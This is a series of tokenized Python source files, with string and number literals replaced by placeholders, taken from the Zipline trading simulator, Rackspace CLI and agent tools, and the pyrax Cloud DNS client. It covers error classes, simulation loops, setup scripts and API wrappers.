<EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> ) . 
strip ( ) <EOL> class WindowedInputToWindowedTerm ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class TermInputsNotSpecified ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class TermOutputsEmpty ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class WindowLengthNotSpecified ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> ) <EOL> class InvalidTermParams ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class DTypeNotSpecified ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> ) <EOL> class NotDType ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class UnsupportedDType ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class BadPercentileBounds ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class UnknownRankMethod ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class AttachPipelineAfterInitialize ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class PipelineOutputDuringInitialize ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class NoSuchPipeline ( ZiplineError , KeyError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class UnsupportedDataType ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class NoFurtherDataError ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = '<STR_LIT>' <EOL> class UnsupportedDatetimeFormat ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) 
<EOL> class PositionTrackerMissingAssetFinder ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class AssetDBVersionError ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class AssetDBImpossibleDowngrade ( ZiplineError ) : <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class HistoryWindowStartsBeforeData ( ZiplineError ) : <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) </s>
<s> from contextlib2 import ExitStack <EOL> from logbook import Logger , Processor <EOL> from pandas . tslib import normalize_date <EOL> from zipline . protocol import BarData <EOL> from zipline . utils . api_support import ZiplineAPI <EOL> from six import viewkeys <EOL> from zipline . gens . sim_engine import ( <EOL> BAR , <EOL> DAY_START , <EOL> DAY_END , <EOL> MINUTE_END <EOL> ) <EOL> log = Logger ( '<STR_LIT>' ) <EOL> class AlgorithmSimulator ( object ) : <EOL> EMISSION_TO_PERF_KEY_MAP = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def __init__ ( self , algo , sim_params , data_portal , clock , benchmark_source , <EOL> universe_func ) : <EOL> self . sim_params = sim_params <EOL> self . env = algo . trading_environment <EOL> self . data_portal = data_portal <EOL> self . algo = algo <EOL> self . algo_start = normalize_date ( self . sim_params . first_open ) <EOL> self . current_data = self . _create_bar_data ( universe_func ) <EOL> self . simulation_dt = None <EOL> self . previous_dt = self . algo_start <EOL> self . clock = clock <EOL> self . benchmark_source = benchmark_source <EOL> def inject_algo_dt ( record ) : <EOL> if '<STR_LIT>' not in record . extra : <EOL> record . extra [ '<STR_LIT>' ] = self . simulation_dt <EOL> self . processor = Processor ( inject_algo_dt ) <EOL> def get_simulation_dt ( self ) : <EOL> return self . simulation_dt <EOL> def _create_bar_data ( self , universe_func ) : <EOL> return BarData ( <EOL> data_portal = self . data_portal , <EOL> simulation_dt_func = self . get_simulation_dt , <EOL> data_frequency = self . sim_params . data_frequency , <EOL> universe_func = universe_func <EOL> ) <EOL> def transform ( self ) : <EOL> """<STR_LIT>""" <EOL> algo = self . algo <EOL> def every_bar ( dt_to_use , current_data = self . current_data , <EOL> handle_data = algo . event_manager . handle_data ) : <EOL> self . simulation_dt = dt_to_use <EOL> algo . on_dt_changed ( dt_to_use ) <EOL> blotter = algo . 
blotter <EOL> perf_tracker = algo . perf_tracker <EOL> new_transactions , new_commissions = blotter . get_transactions ( current_data ) <EOL> for transaction in new_transactions : <EOL> perf_tracker . process_transaction ( transaction ) <EOL> order = blotter . orders [ transaction . order_id ] <EOL> perf_tracker . process_order ( order ) <EOL> if new_commissions : <EOL> for commission in new_commissions : <EOL> perf_tracker . process_commission ( commission ) <EOL> handle_data ( algo , current_data , dt_to_use ) <EOL> new_orders = blotter . new_orders <EOL> blotter . new_orders = [ ] <EOL> if new_orders : <EOL> for new_order in new_orders : <EOL> perf_tracker . process_order ( new_order ) <EOL> self . algo . portfolio_needs_update = True <EOL> self . algo . account_needs_update = True <EOL> self . algo . performance_needs_update = True <EOL> def once_a_day ( midnight_dt , current_data = self . current_data , <EOL> data_portal = self . data_portal ) : <EOL> positions = algo . perf_tracker . position_tracker . positions <EOL> position_assets = algo . asset_finder . retrieve_all ( positions ) <EOL> self . simulation_dt = midnight_dt <EOL> algo . on_dt_changed ( midnight_dt ) <EOL> self . _cleanup_expired_assets ( midnight_dt , position_assets ) <EOL> perf_tracker = algo . perf_tracker <EOL> assets_we_care_about = viewkeys ( perf_tracker . position_tracker . positions ) | viewkeys ( algo . blotter . open_orders ) <EOL> if assets_we_care_about : <EOL> splits = data_portal . get_splits ( assets_we_care_about , <EOL> midnight_dt ) <EOL> if splits : <EOL> algo . blotter . process_splits ( splits ) <EOL> perf_tracker . position_tracker . handle_splits ( splits ) <EOL> algo . before_trading_start ( current_data ) <EOL> def handle_benchmark ( date , benchmark_source = self . benchmark_source ) : <EOL> algo . perf_tracker . all_benchmark_returns [ date ] = benchmark_source . get_value ( date ) <EOL> def on_exit ( ) : <EOL> self . benchmark_source = self . current_data = self . 
data_portal = None <EOL> with ExitStack ( ) as stack : <EOL> stack . callback ( on_exit ) <EOL> stack . enter_context ( self . processor ) <EOL> stack . enter_context ( ZiplineAPI ( self . algo ) ) <EOL> if algo . data_frequency == '<STR_LIT>' : <EOL> def execute_order_cancellation_policy ( ) : <EOL> algo . blotter . execute_cancel_policy ( DAY_END ) <EOL> else : <EOL> def execute_order_cancellation_policy ( ) : <EOL> pass <EOL> for dt , action in self . clock : <EOL> if action == BAR : <EOL> every_bar ( dt ) <EOL> elif action == DAY_START : <EOL> once_a_day ( dt ) <EOL> elif action == DAY_END : <EOL> execute_order_cancellation_policy ( ) <EOL> handle_benchmark ( normalize_date ( dt ) ) <EOL> yield self . _get_daily_message ( dt , algo , algo . perf_tracker ) <EOL> elif action == MINUTE_END : <EOL> handle_benchmark ( dt ) <EOL> minute_msg , daily_msg = self . _get_minute_message ( dt , algo , algo . perf_tracker ) <EOL> yield minute_msg <EOL> if daily_msg : <EOL> yield daily_msg <EOL> risk_message = algo . perf_tracker . handle_simulation_end ( ) <EOL> yield risk_message <EOL> def _cleanup_expired_assets ( self , dt , position_assets ) : <EOL> """<STR_LIT>""" <EOL> algo = self . algo <EOL> def past_auto_close_date ( asset ) : <EOL> acd = asset . auto_close_date <EOL> return acd is not None and acd <= dt <EOL> assets_to_clear = [ asset for asset in position_assets if past_auto_close_date ( asset ) ] <EOL> perf_tracker = algo . perf_tracker <EOL> data_portal = self . data_portal <EOL> for asset in assets_to_clear : <EOL> perf_tracker . process_close_position ( asset , dt , data_portal ) <EOL> blotter = algo . blotter <EOL> assets_to_cancel = set ( [ asset for asset in blotter . open_orders <EOL> if past_auto_close_date ( asset ) ] ) <EOL> for asset in assets_to_cancel : <EOL> blotter . cancel_all_orders_for_asset ( asset ) <EOL> def _get_daily_message ( self , dt , algo , perf_tracker ) : <EOL> """<STR_LIT>""" <EOL> perf_message = perf_tracker . 
handle_market_close_daily ( <EOL> dt , self . data_portal , <EOL> ) <EOL> perf_message [ '<STR_LIT>' ] [ '<STR_LIT>' ] = algo . recorded_vars <EOL> return perf_message <EOL> def _get_minute_message ( self , dt , algo , perf_tracker ) : <EOL> """<STR_LIT>""" <EOL> rvars = algo . recorded_vars <EOL> minute_message , daily_message = perf_tracker . handle_minute_close ( <EOL> dt , self . data_portal , <EOL> ) <EOL> minute_message [ '<STR_LIT>' ] [ '<STR_LIT>' ] = rvars <EOL> if daily_message : <EOL> daily_message [ "<STR_LIT>" ] [ "<STR_LIT>" ] = rvars <EOL> return minute_message , daily_message </s>
<s> from . _13d_filings import _13DFilingsLoader <EOL> from . earnings import EarningsCalendarLoader <EOL> from . consensus_estimates import ConsensusEstimatesLoader <EOL> from . buyback_auth import ( <EOL> CashBuybackAuthorizationsLoader , <EOL> ShareBuybackAuthorizationsLoader <EOL> ) <EOL> from . dividends import ( <EOL> DividendsByAnnouncementDateLoader , <EOL> DividendsByExDateLoader , <EOL> DividendsByPayDateLoader , <EOL> ) <EOL> from . equity_pricing_loader import USEquityPricingLoader <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from abc import ( <EOL> ABCMeta , <EOL> abstractproperty <EOL> ) <EOL> from six import with_metaclass <EOL> from zipline . protocol import DATASOURCE_TYPE <EOL> from zipline . protocol import Event <EOL> class DataSource ( with_metaclass ( ABCMeta ) ) : <EOL> @ property <EOL> def event_type ( self ) : <EOL> return DATASOURCE_TYPE . TRADE <EOL> @ property <EOL> def mapping ( self ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> @ abstractproperty <EOL> def raw_data ( self ) : <EOL> """<STR_LIT>""" <EOL> NotImplemented <EOL> @ abstractproperty <EOL> def instance_hash ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def get_hash ( self ) : <EOL> return self . __class__ . __name__ + "<STR_LIT:->" + self . instance_hash <EOL> def apply_mapping ( self , raw_row ) : <EOL> """<STR_LIT>""" <EOL> row = { } <EOL> row . update ( { '<STR_LIT:type>' : self . event_type } ) <EOL> row . update ( { target : mapping_func ( raw_row [ source_key ] ) <EOL> for target , ( mapping_func , source_key ) <EOL> in self . mapping . items ( ) } ) <EOL> row . update ( { '<STR_LIT>' : self . get_hash ( ) } ) <EOL> return row <EOL> @ property <EOL> def mapped_data ( self ) : <EOL> for row in self . raw_data : <EOL> yield Event ( self . apply_mapping ( row ) ) <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> return self . mapped_data . next ( ) <EOL> def __next__ ( self ) : <EOL> return next ( self . mapped_data ) </s>
<s> import math <EOL> def tolerant_equals ( a , b , atol = <NUM_LIT> , rtol = <NUM_LIT> ) : <EOL> return math . fabs ( a - b ) <= ( atol + rtol * math . fabs ( b ) ) <EOL> try : <EOL> import bottleneck as bn <EOL> nanmean = bn . nanmean <EOL> nanstd = bn . nanstd <EOL> nansum = bn . nansum <EOL> nanmax = bn . nanmax <EOL> nanmin = bn . nanmin <EOL> nanargmax = bn . nanargmax <EOL> nanargmin = bn . nanargmin <EOL> except ImportError : <EOL> import numpy as np <EOL> nanmean = np . nanmean <EOL> nanstd = np . nanstd <EOL> nansum = np . nansum <EOL> nanmax = np . nanmax <EOL> nanmin = np . nanmin <EOL> nanargmax = np . nanargmax <EOL> nanargmin = np . nanargmin <EOL> def round_if_near_integer ( a , epsilon = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if abs ( a - round ( a ) ) <= epsilon : <EOL> return round ( a ) <EOL> else : <EOL> return a </s>
<s> import os <EOL> from setuptools import setup , find_packages <EOL> here = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> version_path = os . path . join ( here , '<STR_LIT>' ) <EOL> version = open ( version_path ) . read ( ) . strip ( ) <EOL> requires = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> CLASSIFIERS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> wsdl_files = [ '<STR_LIT>' + item for item in os . listdir ( '<STR_LIT>' ) ] <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' , '<STR_LIT:r>' ) . read ( ) , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> keywords = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> url = '<STR_LIT>' , <EOL> zip_safe = False , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> install_requires = requires , <EOL> include_package_data = True , <EOL> data_files = [ ( '<STR_LIT>' , wsdl_files ) ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } <EOL> ) </s>
<s> </s>
<s> import os <EOL> import platform <EOL> from setuptools import setup <EOL> install_requires = [ ] <EOL> if platform . system ( ) == "<STR_LIT>" : <EOL> install_requires = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> elif platform . system ( ) == "<STR_LIT>" : <EOL> install_requires = [ '<STR_LIT>' ] <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = "<STR_LIT>" , <EOL> description = ( "<STR_LIT>" ) , <EOL> url = "<STR_LIT>" , <EOL> download_url = '<STR_LIT>' , <EOL> keywords = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:html>' , '<STR_LIT>' ] , <EOL> install_requires = install_requires , <EOL> version = '<STR_LIT:1.0>' , <EOL> packages = [ '<STR_LIT>' , ] , <EOL> license = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> ) </s>
<s> import pypandoc <EOL> with open ( '<STR_LIT>' , '<STR_LIT:wb>' ) as f : <EOL> f . write ( pypandoc . convert ( '<STR_LIT>' , '<STR_LIT>' ) . encode ( '<STR_LIT:utf-8>' ) ) </s>
<s> from distutils . core import setup <EOL> import py2exe <EOL> setup ( console = [ '<STR_LIT>' ] ) </s>
<s> import sys , json , httplib , base64 <EOL> if len ( sys . argv ) < <NUM_LIT:4> : <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> server , port = sys . argv [ <NUM_LIT:1> ] . split ( "<STR_LIT::>" ) <EOL> username = sys . argv [ <NUM_LIT:2> ] <EOL> password = sys . argv [ <NUM_LIT:3> ] <EOL> conn = httplib . HTTPConnection ( server , port ) <EOL> path = "<STR_LIT>" <EOL> method = "<STR_LIT:GET>" <EOL> credentials = base64 . b64encode ( "<STR_LIT>" % ( username , password ) ) <EOL> conn . request ( method , path , "<STR_LIT>" , <EOL> { "<STR_LIT:Content-Type>" : "<STR_LIT:application/json>" , <EOL> "<STR_LIT>" : "<STR_LIT>" + credentials } ) <EOL> response = conn . getresponse ( ) <EOL> if response . status > <NUM_LIT> : <EOL> print "<STR_LIT>" % ( response . status , <EOL> response . read ( ) ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> resp_payload = json . loads ( response . read ( ) ) <EOL> for node in resp_payload : <EOL> print "<STR_LIT>" % node <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % node <EOL> print "<STR_LIT>" % node <EOL> print "<STR_LIT>" % node <EOL> print "<STR_LIT>" % node <EOL> print "<STR_LIT>" % node <EOL> print "<STR_LIT>" % node <EOL> print "<STR_LIT:\n>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> for app in node [ "<STR_LIT>" ] : <EOL> print "<STR_LIT>" % app <EOL> print "<STR_LIT>" % app <EOL> print "<STR_LIT>" % app <EOL> sys . exit ( <NUM_LIT:0> ) </s>
<s> import logging <EOL> from raxcli . models import Collection <EOL> from raxcli . apps . monitoring . utils import MonitoringListCommand , get_client <EOL> from raxcli . apps . monitoring . resources import Entity <EOL> class ListCommand ( MonitoringListCommand ) : <EOL> """<STR_LIT>""" <EOL> log = logging . getLogger ( __name__ ) <EOL> def take_action ( self , parsed_args ) : <EOL> client = get_client ( parsed_args ) <EOL> marker = parsed_args . marker if parsed_args . marker else None <EOL> kwargs = { '<STR_LIT>' : marker } <EOL> entities = [ Entity ( entity ) <EOL> for entity in client . list_entities ( ** kwargs ) ] <EOL> collection = Collection ( entities ) <EOL> return collection . generate_output ( ) </s>
<s> import sys <EOL> import unittest2 as unittest <EOL> from raxcli . utils import get_enum_as_dict <EOL> class TestUtils ( unittest . TestCase ) : <EOL> def test_get_enum_as_dict ( self ) : <EOL> class EnumClass1 ( object ) : <EOL> KEY1 = <NUM_LIT:0> <EOL> KEY_TWO_TWO = <NUM_LIT:1> <EOL> SOME_KEY_SOME_SOME = <NUM_LIT:2> <EOL> result1 = get_enum_as_dict ( EnumClass1 , friendly_names = False ) <EOL> result2 = get_enum_as_dict ( EnumClass1 , friendly_names = True ) <EOL> result1_reversed = get_enum_as_dict ( EnumClass1 , reverse = True , <EOL> friendly_names = False ) <EOL> expected1 = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> <EOL> } <EOL> expected2 = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> <EOL> } <EOL> expected3 = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' <EOL> } <EOL> self . assertDictEqual ( result1 , expected1 ) <EOL> self . assertDictEqual ( result2 , expected2 ) <EOL> self . assertDictEqual ( result1_reversed , expected3 ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( unittest . main ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import subprocess <EOL> import logging <EOL> import commands . network <EOL> RHN_PATH = '<STR_LIT>' <EOL> SYSTEMID_PATH = os . path . join ( RHN_PATH , '<STR_LIT>' ) <EOL> UP2DATE_PATH = os . path . join ( RHN_PATH , '<STR_LIT>' ) <EOL> def register_with_rhn ( activation_key , profile ) : <EOL> if os . path . exists ( SYSTEMID_PATH ) : <EOL> os . unlink ( SYSTEMID_PATH ) <EOL> logging . debug ( '<STR_LIT>' + '<STR_LIT>' % profile ) <EOL> pipe = subprocess . PIPE <EOL> p = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' , <EOL> activation_key , '<STR_LIT>' , profile , '<STR_LIT>' ] , <EOL> stdin = pipe , stdout = pipe , stderr = pipe , env = { } ) <EOL> logging . debug ( '<STR_LIT>' % p . pid ) <EOL> status = os . waitpid ( p . pid , <NUM_LIT:0> ) [ <NUM_LIT:1> ] <EOL> logging . debug ( '<STR_LIT>' % status ) <EOL> if status != <NUM_LIT:0> : <EOL> return ( <NUM_LIT> , "<STR_LIT>" % status ) <EOL> def configure_up2date ( domains ) : <EOL> if not isinstance ( domains , list ) : <EOL> domains = [ domains ] <EOL> domains = [ '<STR_LIT>' % d for d in domains ] <EOL> serverURL = '<STR_LIT:;>' . join ( [ '<STR_LIT>' % h for h in domains ] ) <EOL> noSSLServerURL = '<STR_LIT:;>' . join ( [ '<STR_LIT>' % h for h in domains ] ) <EOL> data = '''<STR_LIT>''' '''<STR_LIT>''' '''<STR_LIT>''' '''<STR_LIT>''' % { '<STR_LIT>' : serverURL , <EOL> '<STR_LIT>' : noSSLServerURL } <EOL> return { UP2DATE_PATH : data } <EOL> def kms_activate ( data ) : <EOL> activation_key = data [ '<STR_LIT>' ] <EOL> profile = data [ '<STR_LIT>' ] <EOL> domains = data [ '<STR_LIT>' ] <EOL> update_files = configure_up2date ( domains ) <EOL> commands . network . update_files ( update_files ) <EOL> ret = register_with_rhn ( activation_key , profile ) <EOL> if ret : <EOL> return ret <EOL> return ( <NUM_LIT:0> , "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import hashlib <EOL> except ImportError : <EOL> import md5 <EOL> class hashlib ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def md5 ( ) : <EOL> return md5 . new ( ) <EOL> import os <EOL> import agent_test <EOL> import agentlib <EOL> import commands . update <EOL> class TestUpdateCommand ( agent_test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestUpdateCommand , self ) . setUp ( ) <EOL> self . update_inst = self . commands . command_instance ( "<STR_LIT>" ) <EOL> def test_1_valid_md5 ( self ) : <EOL> """<STR_LIT>""" <EOL> test_file = os . path . abspath ( __file__ ) <EOL> f = file ( test_file , '<STR_LIT:rb>' ) <EOL> m = hashlib . md5 ( ) <EOL> while True : <EOL> file_data = f . read ( <NUM_LIT> ) <EOL> if not file_data : <EOL> break <EOL> m . update ( file_data ) <EOL> f . close ( ) <EOL> md5sum = m . hexdigest ( ) <EOL> url = "<STR_LIT>" + test_file <EOL> local_file = self . update_inst . _get_to_local_file ( url , md5sum ) <EOL> f = file ( local_file ) <EOL> m = hashlib . md5 ( ) <EOL> while True : <EOL> file_data = f . read ( <NUM_LIT> ) <EOL> if not file_data : <EOL> break <EOL> m . update ( file_data ) <EOL> f . close ( ) <EOL> os . unlink ( local_file ) <EOL> self . assertEqual ( md5sum , m . hexdigest ( ) ) <EOL> def test_2_invalid_md5 ( self ) : <EOL> """<STR_LIT>""" <EOL> test_file = os . path . abspath ( __file__ ) <EOL> url = "<STR_LIT>" + test_file <EOL> self . assertRaises ( commands . update . AgentUpdateError , <EOL> self . update_inst . _get_to_local_file , url , '<STR_LIT>' ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> agent_test . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> from com . rackspace . cloud . servers . api . client . entity import Entity <EOL> from com . rackspace . cloud . servers . api . client . jsonwrapper import json <EOL> """<STR_LIT>""" <EOL> class SharedIpGroup ( Entity ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = "<STR_LIT>" , server = None ) : <EOL> """<STR_LIT>""" <EOL> super ( SharedIpGroup , self ) . __init__ ( name ) <EOL> self . _servers = server <EOL> self . _manager = None <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . _name , self . _servers ) <EOL> def __eq__ ( self , other ) : <EOL> return ( self . _id , self . _name , self . _servers ) == ( other . _id , other . _name , other . _servers ) <EOL> def __ne__ ( self , other ) : <EOL> return ( self . _id , self . _name , self . _servers ) != ( other . _id , other . _name , other . _servers ) <EOL> def _get_name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _name <EOL> def _set_name ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . _name = value <EOL> name = property ( _get_name , _set_name ) <EOL> @ property <EOL> def servers ( self ) : <EOL> return self . _servers <EOL> @ property <EOL> def asDict ( self ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( self . _servers , "<STR_LIT>" ) : <EOL> serverKey = "<STR_LIT>" <EOL> else : <EOL> serverKey = "<STR_LIT>" <EOL> return { "<STR_LIT>" : { "<STR_LIT:id>" : self . _id , "<STR_LIT:name>" : self . _name , serverKey : self . _servers } } <EOL> @ property <EOL> def asJSON ( self ) : <EOL> """<STR_LIT>""" <EOL> return json . dumps ( self . asDict ) <EOL> def initFromResultDict ( self , dic ) : <EOL> """<STR_LIT>""" <EOL> if dic is None : <EOL> return <EOL> sharedIpGroupCopy = copy . copy ( self ) <EOL> self . _id = dic . get ( "<STR_LIT:id>" ) <EOL> self . _name = dic . get ( "<STR_LIT:name>" ) <EOL> self . _servers = dic . get ( "<STR_LIT>" ) <EOL> self . _notifyIfChanged_ ( sharedIpGroupCopy ) </s>
<s> from functools import wraps <EOL> import json <EOL> import re <EOL> import time <EOL> import six <EOL> import pyrax <EOL> from pyrax . client import BaseClient <EOL> from pyrax . cloudloadbalancers import CloudLoadBalancer <EOL> import pyrax . exceptions as exc <EOL> from pyrax . manager import BaseManager <EOL> from pyrax . resource import BaseResource <EOL> import pyrax . utils as utils <EOL> DEFAULT_TIMEOUT = <NUM_LIT:5> <EOL> DEFAULT_DELAY = <NUM_LIT:0.5> <EOL> DEFAULT_RETRY = <NUM_LIT:3> <EOL> def assure_domain ( fnc ) : <EOL> @ wraps ( fnc ) <EOL> def _wrapped ( self , domain , * args , ** kwargs ) : <EOL> if not isinstance ( domain , CloudDNSDomain ) : <EOL> try : <EOL> domain = self . _manager . get ( domain ) <EOL> except exc . NotFound : <EOL> domain = self . _manager . find ( name = domain ) <EOL> return fnc ( self , domain , * args , ** kwargs ) <EOL> return _wrapped <EOL> class CloudDNSRecord ( BaseResource ) : <EOL> """<STR_LIT>""" <EOL> GET_DETAILS = False <EOL> type = None <EOL> name = None <EOL> data = None <EOL> priority = None <EOL> ttl = None <EOL> comment = None <EOL> def update ( self , data = None , priority = None , ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . update_record ( self . domain_id , self , data = data , <EOL> priority = priority , ttl = ttl , comment = comment ) <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . get_record ( self . domain_id , self ) <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . delete_record ( self . domain_id , self ) <EOL> class CloudDNSDomain ( BaseResource ) : <EOL> """<STR_LIT>""" <EOL> def delete ( self , delete_subdomains = False ) : <EOL> """<STR_LIT>""" <EOL> self . manager . delete ( self , delete_subdomains = delete_subdomains ) <EOL> def changes_since ( self , date_or_datetime ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . 
changes_since ( self , date_or_datetime ) <EOL> def export ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . export_domain ( self ) <EOL> def update ( self , emailAddress = None , ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . update_domain ( self , emailAddress = emailAddress , <EOL> ttl = ttl , comment = comment ) <EOL> def list_subdomains ( self , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . list_subdomains ( self , limit = limit , offset = offset ) <EOL> def list_records ( self , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . list_records ( self , limit = limit , offset = offset ) <EOL> def search_records ( self , record_type , name = None , data = None ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . search_records ( self , record_type = record_type , <EOL> name = name , data = data ) <EOL> def find_record ( self , record_type , name = None , data = None ) : <EOL> """<STR_LIT>""" <EOL> matches = self . manager . search_records ( self , record_type = record_type , <EOL> name = name , data = data ) <EOL> if not matches : <EOL> raise exc . DomainRecordNotFound <EOL> elif len ( matches ) > <NUM_LIT:1> : <EOL> raise exc . DomainRecordNotUnique <EOL> return matches [ <NUM_LIT:0> ] <EOL> def add_records ( self , records ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . add_records ( self , records ) <EOL> add_record = add_records <EOL> def get_record ( self , record ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . get_record ( self , record ) <EOL> def update_record ( self , record , data = None , priority = None , <EOL> ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . update_record ( self , record , data = data , <EOL> priority = priority , ttl = ttl , comment = comment ) <EOL> def update_records ( self , records ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . 
